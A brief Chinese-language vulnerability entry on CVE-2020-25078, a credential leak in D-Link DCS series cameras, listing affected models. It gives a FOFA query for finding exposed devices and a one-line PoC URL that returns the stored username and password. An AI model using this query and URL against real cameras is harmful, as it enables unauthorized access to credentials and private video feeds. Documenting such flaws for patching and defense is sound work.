# D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。
FOFA:
app=”D_Link-DCS-2530L”
影响版本:
* DCS-2530L
* DCS-2670L
* DCS-4603
* DCS-4622
* 等多个DCS系列系统
PoC:
“`
http://xxx.xxx.xxx.xxx/config/getuser?index=0
“`
ref:
https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容